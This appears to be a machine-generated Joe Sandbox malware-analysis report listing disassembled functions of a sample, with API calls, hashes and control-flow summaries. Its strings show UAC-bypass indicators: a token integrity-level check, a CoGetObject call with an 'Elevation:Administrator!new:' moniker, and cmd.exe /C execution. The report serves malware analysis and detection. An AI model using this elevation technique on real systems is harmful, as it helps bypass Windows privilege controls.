                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Token$InformationLocal$AllocChangeCloseFindFreeNotificationOpenProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2854556994-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e4b4cc31351ce880421fb230fd6ac05725b6f10eb8191371f756e524e2f733f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED313CB4A04208FFDB14CFD4C948BAEBBF8AB48301F1081AAE511B72D4D774AB04DB65
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00404369 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 00404380
                                                                                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00404388
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000180,00600000), ref: 00409626
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000178,00600000), ref: 0040963C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitProcessSectionStringUnicode$AllocateChangeCloseDirectoryEnterEnumerateExitFileFindFreeInitializeLeaveLoadedLocalMemoryModuleModulesNameNotificationOpenTokenVirtualWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 41577365-3057154508
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c5e22f618a67b604fe27e09ba26f5c85a86b36c7864aea17beee92a495aee461
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b01f62542bec0b1d87828faea97dd6a3c55c304531570e4c9315d46f9a50642
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5e22f618a67b604fe27e09ba26f5c85a86b36c7864aea17beee92a495aee461
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9411ABB290430866D710BB60EC47FDE73299B54705F0045BBB709B50C2ED7997D88EAE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00407AB9 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 53 407ab9-407abc 54 407a69-407a8e LocalAlloc GetTokenInformation 53->54 55 407abe 53->55 56 407a94 54->56 57 40103c-40106b GetSidSubAuthorityCount GetSidSubAuthority 54->57 58 407abf-407ad2 55->58 59 401236-40123a 56->59 60 401071 57->60 61 409c8c-409c9c OpenProcessToken 57->61 62 408020-408024 58->62 63 407ad8-407afe call 4055b9 58->63 69 401240-40124a FindCloseChangeNotification 59->69 70 403bc5-403bc9 59->70 60->59 65 407a51-407a68 GetTokenInformation 61->65 66 409ca2 61->66 67 401ea5-401eb9 62->67 68 40802a-408031 62->68 78 407b04-407b0a 63->78 79 4059ea 63->79 65->54 66->59 74 402035-40203e 67->74 75 401ebf-401ed3 67->75 72 408037-408039 68->72 73 4021ce 68->73 69->70 76 40294f-402955 70->76 77 403bcf-403bd9 LocalFree 70->77 80 403d6f-403d72 72->80 73->80 81 4045e8-4045fb 74->81 75->74 82 401ed9-401ee0 75->82 77->76 78->62 79->58 84 404601-404621 call 4055b9 call 40b8c1 81->84 85 409bce-409beb call 40c187 call 40dcf9 call 40ce09 81->85 82->74 83 401ee6-401ee8 82->83 83->80 94 40b344 84->94 95 404627-40462e 84->95 101 409bf1-409bf3 85->101 102 4024fe-40250e call 40dcf9 85->102 94->81 95->94 97 404634-40463e 95->97 99 404644-40464b 97->99 100 40cc1b-40cc25 97->100 103 404651 99->103 104 409ca7-40a398 99->104 105 40cc2b-40cc32 100->105 106 40997f-409986 100->106 101->80 102->80 103->100 104->94 112 40a39e-40a3b3 104->112 105->104 109 40cc38 105->109 106->94 110 40998c 106->110 109->106 110->104 113 40a3b6 112->113 113->113
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Local$AllocChangeCloseFindFreeInformationNotificationToken
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2094194634-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c14f008afbfcab52b1f24e0be9b5b67c8a06fc3440972dff98bedf792b56cd5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E215E74D04208EFCB04CFE4C959AEEBBB5AB08305F1480AAE505B7394C7746B40DF29
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00409727 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 114 409727-40973b 115 409741-409744 114->115 116 402106-402115 call 405c31 114->116 118 404b9d-404ba0 115->118 120 40d182-40d18d 116->120 121 40211b-40211e 116->121 122 40d193-40d1f1 call 408bfe call 40b160 call 40335c CoGetObject 120->122 123 40d18e call 40335c 120->123 121->118 123->122
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4251798642
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ae50f5eb3c30b6def060569edfd5a96dae8f03997bbe75f6d7b2be729599e56
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B31154B1C1020CABCB10EF94DD85AEE7778AB54305F14456AFA097A181E738EB44CBA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040D17F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 131 40d17f-40d181 132 40d183-40d1ea call 40335c call 408bfe call 40b160 call 40335c 131->132 133 40d1eb-40d1f1 CoGetObject 131->133 132->133
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CoGetObject.OLE32(?,00000024,?,?), ref: 0040D1EB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Object
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2936123098-4251798642
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b31a3ccbf289bc63fcd2c03f84205c468a6b0dd351633bc6c62a4601e098767b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 140162B2810208ABCB05EF90DC95DDE7B78AB18305F08455EF9057A181EB39E748CB75
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004063CE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405312: RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405312: RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Process$ChangeCloseEnvironmentExitExpandFindFreeInitLocalNotificationOpenStringStrings_TokenUnicode
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1629495445-3057154508
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 74dd183bfbc60cce3caee40a229eb83cba66efea863e32e52d49e009b086718c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6885a5c3f576ce6d6f9b2f3c688c14414178aeb406d1450dcc701d4c4953fbe4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74dd183bfbc60cce3caee40a229eb83cba66efea863e32e52d49e009b086718c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0A4F280030866CB10EB70DC46FDA33389B14305F0045BAB609B60C2EE7997C88AAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004069BB Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 213 4069bb-4069df call 404b1d * 2 218 40a530-40a534 213->218 219 402b51-402b55 218->219 220 40a536-40a547 LoadLibraryA 218->220 221 40a54d-40a54e 220->221 222 40beae-40beb9 call 404873 220->222 221->222 222->218
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: df007bf62870af7b74df0dbbe881ec21055e906183b30cdd37e1bfed71aa1605
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE0EC631002087AD7102995DC46FE7765DD7C83A9F508432F705E61D1D63DD95092AE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401352 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a34d84a8aa74edc03bf23277289f2878ef58b524965e171c6cbb9bf5a1c13c13
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF01276C0020CFFCF01AFA5C995CADBF75FF08204B0484AEF90426162DB369A24EB04
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040A554 Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 239 40a554-40a55a 240 40a536-40a547 LoadLibraryA 239->240 241 40a55c-40a55e 239->241 242 40beae-40beb9 call 404873 240->242 243 40a54d-40a54e 240->243 241->242 242->240 247 402b51-402b55 242->247 243->242
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 523668955e0e2244aa789caa92f6427d01868abc63ade59164da16a1192ab317
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5E0D831004604ADCB11DE58EC8EBDA7298D705311F6498339906FD581CB3CDA85859F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040135E Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 232 40135e-401365 233 40136b-4013a6 call 404873 call 404b1d VirtualProtect 232->233 234 401366 call 403d7b 232->234 234->233
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
